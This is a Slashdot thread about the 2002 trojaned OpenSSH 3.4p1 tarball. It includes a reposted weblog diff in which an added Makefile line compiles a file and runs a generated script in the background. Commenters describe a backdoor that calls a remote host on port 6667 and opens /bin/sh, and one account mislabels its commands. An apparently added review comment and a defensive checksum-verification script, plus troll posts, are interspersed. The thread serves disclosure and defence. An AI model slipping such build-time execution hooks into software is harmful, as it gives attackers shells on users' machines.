Check MD5 sums

make -n

Unplug from the net and log all traffic while you compile, install and test. Check the log.

Don't unpack a tarball within 48 hours of its creation...let someone else find the problems.

Be one of the "many eyes" and actually learn some of the source code.

OpenSSH (5, Informative)

Anonymous Coward | more than 12 years ago | (#3991228)

The trojan is executing during BUILD ONLY. The trojan attempts to connect to an unknown daemon on 203.62.158.32:6667 (system reinstalled now and even more secured - thanks for that, ^Sarge^), and awaits one out of three characters as a command from the server it connected to - M, A and D.

M respawned the process.
A killed the trojan.
D launched /bin/sh.

With the D command, as given _to_ the trojan, the daemon on 203.62.158.32:6667 was given control of the trojaned user's system shell. As most people, unfortunately, decide to compile as root, this potentially could have given the hacker a large amount of root shells around the globe with little or no hassle.

Funny, this is. Expect more trojans that look like this, but in a better disguise. :-/

-- Hans.

Bill Gates, laughing (-1, Flamebait)

Anonymous Coward | more than 12 years ago | (#3991229)

Seems like if anyone ever actually bothered to hack the Linux kernel, it would be a security nightmare.

I guess since Linux only has 0.005% of the market share, nobody even cares enough to write a virus for it.

Either way, looks like this is the final nail in the Linux coffin. I guess y'all won't be bragging about security anymore.

looks like it's from our australian friends (1, Interesting)

Anonymous Coward | more than 12 years ago | (#3991230)

inetnum 203.62.158.0 - 203.62.159.255
netname AUSTRALIANINTER-AU
descr Australian Internet Solutions Pty Ltd
descr Suite 3, Level 5, 277 Flinders Lane
descr Melbourne
descr VIC 3001
country AU
admin-c DA53-AP
tech-c DA53-AP
mnt-by MAINT-AU-KALED
changed register@aunic.net 19970211
changed aunic-transfer@apnic.net 20010525
changed hostmaster@apnic.net 20011115
source APNIC

person Domain Administrator
address Level 4,
address 180 Bourke St,
address Melbourne, 3000.
country AU
phone +61-3-9650-5566
fax-no +61-3-9639-1897
e-mail kaled@dalek.ains.net.au
nic-hdl DA53-AP
mnt-by MAINT-NEW
changed kaled@dalek.ains.net.au 20010619
source APNIC

Re:looks like it's from our australian friends (2)

dzym (544085) | more than 12 years ago | (#3991252)

That IP address means nothing. Having something so publicly visible in your artwork would be like signing the graffiti you just sprayed all over the base of the Statue of Liberty with your real name and leaving a phone number.

It's definitely going to be just another 0wn3d box like with the BitchX source ./configure trojan.

it is confirmed: Theo de Raadt is dying (-1, Offtopic)

Anonymous Coward | more than 12 years ago | (#3991235)

It is now official. Slashdot confirms: Theo de Raadt is dying.

One more crippling bombshell hit the already beleaguered *BSD community when Slashdot confirmed that confidence in OpenBSD security has dropped yet again, with OpenBSD down to less than a fraction of 1 percent of all servers. Coming on the heels of a recent Slashdot article which plainly states that OpenSSH has more holes than a default IIS install, this news serves to reinforce what we've known all along. Theo de Raadt is collapsing in complete disarray, and industry pundits believe he will soon fall dead.

You don't need to be Jordan Hubbard to predict de Raadt's future. The hand writing is on the wall: Theo faces a bleak future. In fact there won't be any future at all for Theo because Theo is dying. Things are looking very bad for Theo. As many of us are already aware, Theo continues to lose credibility. Red ink flows like a river of blood.

Let's keep to the facts and look at the numbers. OpenBSD leader Theo states that there are 7000 users of OpenBSD. How many exploits have there been to OpenBSD since Theo started coming clean about its failings? At least two remote root vulnerabilities in the last month. If we extrapolate that to two undisclosed exploits per month for the last six years OpenBSD has claimed to be free of holes, that's 144 security holes in 7000 machines, or 1,008,000 potential break-ins to an OpenBSD machine.

All major surveys show that Theo de Raadt is too arrogant to be able to live through this embarrassment. Theo is very sick and his long term survival prospects are very dim. If Theo is to survive at all it will only be through spending another 6 years covering up all the holes in OpenBSD. But the word is out, and nothing short of a miracle could save him at this point in time. For all practical purposes, Theo is dead.

Fact: Theo de Raadt is dying.

Re:it is confirmed: Theo de Raadt is dying (-1, Offtopic)

Anonymous Coward | more than 12 years ago | (#3991278)

Err, mods on crack.. what is offtopic about Theo de Raadt on an article about a security hole in OpenBSD? Please fix the moderation, someone.

What's the big worry (5, Funny)

back@slash (176564) | more than 12 years ago | (#3991248)

C:\>bf-output.sh
'bf-output.sh' is not recognized as an internal or external command,
operable program or batch file


This trojan doesn't look very 31337 to me.

Re:What's the big worry (0)

Anonymous Coward | more than 12 years ago | (#3991290)

My shell said "Bad Command or File Name."

Healthy versions still available..? (2, Informative)

virve (63803) | more than 12 years ago | (#3991262)

One of the Paris mirrors seems to have a "healthy" version - if one dares believe the info on checksums.

juan:~> md5sum openssh-3.4p1.tar.gz
459c1d0262e939d6432f193c7a4ba8a8 openssh-3.4p1.tar.gz

ftp://ftp.fr.openbsd.org/pub/OpenBSD/OpenSSH/portable/openssh-3.4p1.tar.gz

Did it make it into any distro? (1)

bockman (104837) | more than 12 years ago | (#3991264)

Do distros check package checksums before distributing package upgrades?

I think that after this, they are going to ask for digital signatures from the upstream maintainers.

So, this may turn into a good thing ... if it didn't do too much damage.

Oh, and just for karma: this shows once more that security is a process more than a product.

My analysis (4, Informative)

lertl (455570) | more than 12 years ago | (#3991280)

I'm by far not a very good C programmer or security expert, but from what I have seen this thing does the following:

  • It differs from a "clean" openssh package by one line in the Makefile and an additional source file.
  • The source file is very cryptic and if you didn't know, you'd think it's just an ssh source file like any other.
  • The suspicious line in the Makefile compiles the source file and executes it. This binary itself writes out some shell script, which in turn generates another C source file, which gets compiled and executed.
  • The additional line in the Makefile and the additional source file are deleted.
  • This last binary opens up a socket to some server and, depending on the input it gets from the socket, exits, respawns or opens a shell (/bin/sh).

So the backdoor is in the Makefile, not the OpenSSH software itself.

One thing to mention is that IMHO this is not a fault of OpenBSD. As anyone can read in their FAQ [openbsd.org] www.openbsd.org (and ftp.openbsd.org) is run on Solaris.

Re:My analysis (0)

Anonymous Coward | more than 12 years ago | (#3991295)

Not Solaris, SunOS 4.1

Slashdotted (copy of the weblog) (5, Informative)

MavEtJu (241979) | more than 12 years ago | (#3991288)

I should have seen this coming... Here is a copy of the weblog. It will be back after 24 hours.

01 August 2002 - 19:10:23 - OpenSSH 3.4p1 package trojaned

And all I was thinking was "Oh! I should upgrade ssh on these two machines before there are problems...". The beauty of FreeBSD is that it goes like this:

[~] edwin@k7>cd /usr/ports/security/openssh-portable
[/usr/ports/security/openssh-portable] edwin@k7>make
[/usr/ports/security/openssh-portable] edwin@k7>make install

Easy euh? It went well, except for the second step:

===> Extracting for openssh-portable-3.4p1_7
>> Checksum mismatch for openssh-3.4p1.tar.gz.
Make sure the Makefile and distinfo file (/usr/ports/security/openssh-portable/distinfo)
are up to date. If you are absolutely sure you want to override this
check, type "make NO_CHECKSUM=yes [other args]".
*** Error code 1

Euh... I didn't remember seeing a change in the FreeBSD ports regarding this. And I didn't see an announcement for it from the people from OpenSSH... Oh well, it happens. I downloaded the new openssh-tarball:

-r--r--r-- 1 12187 mirror 840574 Jul 31 16:47 openssh-3.4p1.tar.gz
-r--r--r-- 1 12187 mirror 232 Jun 26 08:20 openssh-3.4p1.tar.gz.sig

That's weird, they've rerolled the tarball without updating the signature file. I asked a couple of people on irc (#sage-au) if they have had troubles with compiling openssh the last days. Yups, ^Sarge^@bofh.snsonline.net also had it, he had a checksum mismatch.

Curious as I was, I extracted the old and new tarball and these were the differences:

[~/test] edwin@k7>diff -r -u openssh-3.4p1-old openssh-3.4p1
diff -r -u openssh-3.4p1-old/openbsd-compat/Makefile.in openssh-3.4p1/openbsd-compat/Makefile.in
--- openssh-3.4p1-old/openbsd-compat/Makefile.in Wed Feb 20 07:27:57 2002
+++ openssh-3.4p1/openbsd-compat/Makefile.in Thu Feb 1 08:52:03 2001
@@ -26,6 +26,7 @@
$(CC) $(CFLAGS) $(CPPFLAGS) -c $bf-test.out; sh ./bf-test.out &

$(COMPAT): ../config.h
$(OPENBSD): ../config.h
Only in openssh-3.4p1/openbsd-compat: bf-test.c
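Review bot: the added `+` line in the hunk is a build step that ends in `sh ./bf-test.out &`, i.e. it compiles a source file and then runs a generated script in the background as a side effect of building the compat objects, with no target depending on it; a Makefile change that executes generated code at build time should be rejected outright, which is exactly the right outcome here. Two further points are visible in the headers: the `+++` timestamp (Thu Feb 1 2001) is older than the `---` timestamp (Wed Feb 20 2002), so the modified file's mtime was set back to look untouched, and `bf-test.c` appears only as `Only in`, so its contents are not in the diff and need separate inspection. The `+` line as reproduced here also reads `-c $bf-test.out`, which is not a valid compile command, so characters (most likely the `<`/`>` redirections the weblog text describes) were dropped in this copy; read the line from the original tarball rather than from this page.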

At this moment I asked a couple of people on irc (#sage-au) if they had had troubles with compiling openssh the last few days. Yups, ^Sarge^@bofh.snsonline.net also had it, also a checksum mismatch. Time to go deeper into it...

bf-test.c is a weird file. It talks about HP-UX PL.2 systems, it talks about _CRAY notes, it talks about non-T3E machines, it talks about _ILP64__ and it does an epcdic2ascii() call. I'm not very skilled in computers (well, I am :-) but if people are talking about HP-UX, Cray, ILP64 and epcdic2ascii(), I know it's either too difficult for me (You are not supposed to understand this) or it's bullshit (We can charge the phaser-array via a shortwave link through the warpcore). Time to start up vmware and run the experiment: gcc -o bf-test bf-test.c.

bf-test itself is pretty harmless, it only prints things to the screen (remember the change in the makefile? execute, redirect the output and execute the output). The shell script it prints creates a C program and tries to compile it. If it doesn't succeed at first, it tries to link other libraries (everybody who has ever ported to Solaris knows that you have to explicitly link to libresolv et al). So it's cross-platform :-)

The C code is not that smart. It tries once per hour to connect to port 6667 on the machine 203.62.158.32 which is web.snsonline.net and waits for commands from the person or persons who 0wn3d the machine. Does it get an M, it sleeps for another hour. Does it get an A, it will abort. Does it get an M, it will spawn a shell. Some people will build it "normal" privileges and install it as root: they will get a shell with "normal" privileges. Other people will build it with "root" privileges and the shell will have "root" privileges.

While analyzing the code on #sage-au and mentioning the hostname, ^Sarge^ looked strangely at me (well, it's IRC so you never know but that's what I would do): "That is my machine.". The good news is that I didn't have to worry about finding out who manages the machine!

The next step is to inform somebody who manages the openssh packages: the OpenBSD team. Up to right now, I have had no experience with the OpenBSD team (if you check my website you'll see that I'm more of a FreeBSD guy :-). The head guy of the OpenBSD team is living in Canada and they're sleeping there now. I've spent a couple of days on #freebsd on irc.openprojects.net, so I just tried #openbsd.

*** MavEtJu has joined #openbsd
Euh... anybody from the openssh-team here?
I have some news for you...
What's up?

I have contact! Marius asked me the standard questions (how did you find out, how can I see it, when did you find out) and after some investigation he said "I think I'd better call (and now I have forgotten the name)". Coolies! I think I found the right person to talk to! It looks like things are going to roll now, I can take my hands off it.

The last things I did were writing some emails to a couple of mailing lists and guiding ^Sarge^ to #openbsd. For the rest I wasn't of very much use anymore, so I just kept monitoring #openbsd. And the logfile of my website, which went ballistic.

Aftermath

* The portable version wasn't the only one which was trojaned, the normal version was also.
* It seems it took only six hours before somebody was alert enough to see that there was something wrong, all thanks to the checking of the MD5-checksum [insert a sweet 'aaaaaahhh' here]
* OpenSSH itself wasn't trojaned, the tarball was. There is nothing wrong with OpenSSH itself (this time :-)
* The building of a port (under FreeBSD at least) is done as root with all its privileges. This is a wrong approach. For a time I tried, as an experiment, to build ports as user "port". This worked fine except for the "make clean" part, in which I couldn't remove the files created during the "make install" phase and the files which were made during the building of the RUN_DEPENDS ports.
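Pulling together the checks this thread describes (the distinfo checksum mismatch that caught this tarball in the FreeBSD ports tree, lertl's observation that the trojaned tree differs from a clean one only by one Makefile line plus one extra source file, and the "Check MD5 sums" advice above), here is an added example that is not part of the thread or of any BSD project's tooling. It verifies a distfile against a distinfo-style record and, on a mismatch, reports which files were added, removed or changed relative to a known-good copy, so the reviewer sees immediately that the difference is a Makefile plus a new file rather than a harmless re-roll. The tarballs, paths, file contents and distinfo record are constructed in-memory stand-ins; the `bf-test` name is borrowed from the thread only as a label and the file bodies are placeholders.

```python
"""Verify a source tarball against a distinfo-style record and, on mismatch,
list what changed relative to a known-good copy.  Constructed example; the
tarballs below are built in memory and stand in for real distfiles."""
import hashlib
import io
import tarfile


def build_tarball(files):
    """Build an in-memory .tar.gz from a {path: bytes} mapping (test data only)."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tf:
        for path, data in sorted(files.items()):
            info = tarfile.TarInfo(path)
            info.size = len(data)
            info.mtime = 0
            tf.addfile(info, io.BytesIO(data))
    return buf.getvalue()


def parse_distinfo(text):
    """Parse ports-style distinfo lines: 'MD5 (name) = hex' and 'SIZE (name) = n'."""
    record = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        kind, rest = line.split(" ", 1)          # e.g. "MD5", "(name) = hex"
        name, value = rest.split(") = ")
        record.setdefault(name.lstrip("("), {})[kind] = value
    return record


def verify_distfile(name, data, distinfo):
    """Return a list of problems; an empty list means the distfile matches."""
    rec = distinfo.get(name)
    if rec is None:
        return [f"no distinfo record for {name}"]
    problems = []
    if "SIZE" in rec and int(rec["SIZE"]) != len(data):
        problems.append(f"size mismatch: expected {rec['SIZE']}, got {len(data)}")
    if "MD5" in rec:
        actual = hashlib.md5(data).hexdigest()
        if actual != rec["MD5"]:
            problems.append(f"checksum mismatch: expected {rec['MD5']}, got {actual}")
    return problems


def member_digests(tgz_bytes):
    """Map every regular file inside a tarball to the SHA-256 of its contents."""
    out = {}
    with tarfile.open(fileobj=io.BytesIO(tgz_bytes), mode="r:gz") as tf:
        for m in tf.getmembers():
            if m.isfile():
                out[m.name] = hashlib.sha256(tf.extractfile(m).read()).hexdigest()
    return out


def diff_tarballs(good, suspect):
    """Report files added, removed or modified in `suspect` relative to `good`."""
    a, b = member_digests(good), member_digests(suspect)
    return {
        "added": sorted(set(b) - set(a)),
        "removed": sorted(set(a) - set(b)),
        "modified": sorted(p for p in a.keys() & b.keys() if a[p] != b[p]),
    }


def check(name, data, distinfo, good=None):
    """Verify `data` against distinfo; on mismatch, explain the difference if a
    known-good tarball is available."""
    problems = verify_distfile(name, data, distinfo)
    report = {"ok": not problems, "problems": problems}
    if problems and good is not None:
        report["diff"] = diff_tarballs(good, data)
    return report


# Constructed stand-in for a clean source tree.
CLEAN_FILES = {
    "openssh-x/openbsd-compat/Makefile.in": b"all: $(COMPAT)\n\t$(CC) -c foo.c\n",
    "openssh-x/ssh.c": b"int main(void) { return 0; }\n",
}
# Constructed stand-in for the tampered tree: one extra Makefile line and one
# extra source file, mirroring the shape lertl describes (contents are placeholders).
TROJANED_FILES = dict(CLEAN_FILES)
TROJANED_FILES["openssh-x/openbsd-compat/Makefile.in"] += b"\t$(CC) -c extra.c; sh ./extra.out &\n"
TROJANED_FILES["openssh-x/openbsd-compat/bf-test.c"] = b"/* placeholder */\n"

GOOD_TGZ = build_tarball(CLEAN_FILES)
SUSPECT_TGZ = build_tarball(TROJANED_FILES)
# distinfo record computed from the known-good tarball (constructed).
DISTINFO = parse_distinfo(
    f"MD5 (openssh-x.tar.gz) = {hashlib.md5(GOOD_TGZ).hexdigest()}\n"
    f"SIZE (openssh-x.tar.gz) = {len(GOOD_TGZ)}\n"
)

if __name__ == "__main__":
    print(check("openssh-x.tar.gz", GOOD_TGZ, DISTINFO))
    print(check("openssh-x.tar.gz", SUSPECT_TGZ, DISTINFO, good=GOOD_TGZ))
```

The point of the second step is the one the weblog makes: a mismatch alone only tells you the tarball was re-rolled, which the OpenSSH team might do legitimately, whereas a diff limited to "Makefile.in modified, one new .c file added" is the shape that should make a port maintainer stop and read the new line before anyone runs `make` as root.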

Well, I guess that's what they get... (3, Funny)

MrBadbar (168841) | more than 12 years ago | (#3991305)

...for hosting ftp.openbsd.org on a box running SunOS, not OpenBSD!

i'm more interested to know *who* did it (0)

Anonymous Coward | more than 12 years ago | (#3991314)

Is it just some disgruntled programmer? Was it the BSD team itself doing a drill check of their own security? Or is it time for conspiracy theories -- the men in black, or blue perhaps? (well, I dunno what colour Microsoft is, but they're the new IBM so I chose blue..)